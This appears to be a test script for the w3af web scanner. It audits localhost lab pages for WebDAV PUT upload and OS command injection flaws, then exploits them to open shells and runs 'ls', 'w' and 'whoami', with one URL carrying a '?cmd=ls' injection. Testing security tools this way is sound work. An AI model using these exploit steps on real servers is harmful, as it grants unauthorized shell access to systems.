# This is a test for file uploads using PUT method, and the exploit of that issue

plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
output config console
set verbose False
back

audit dav, osCommanding
discovery serverHeader
back

target
set target http://localhost/w3af/audit/dav/ , http://localhost/w3af/audit/os_commanding/simple_osc.php?cmd=ls
back

start

exploit
exploit * stopOnFirst

interact
interact 0
ls
w

endInteraction

interact 1
ls
whoami

endInteraction

back
assert len(kb.kb.getData('davShell','shell')) == 1
assert len(kb.kb.getData('osCommandingShell','shell')) == 0

exit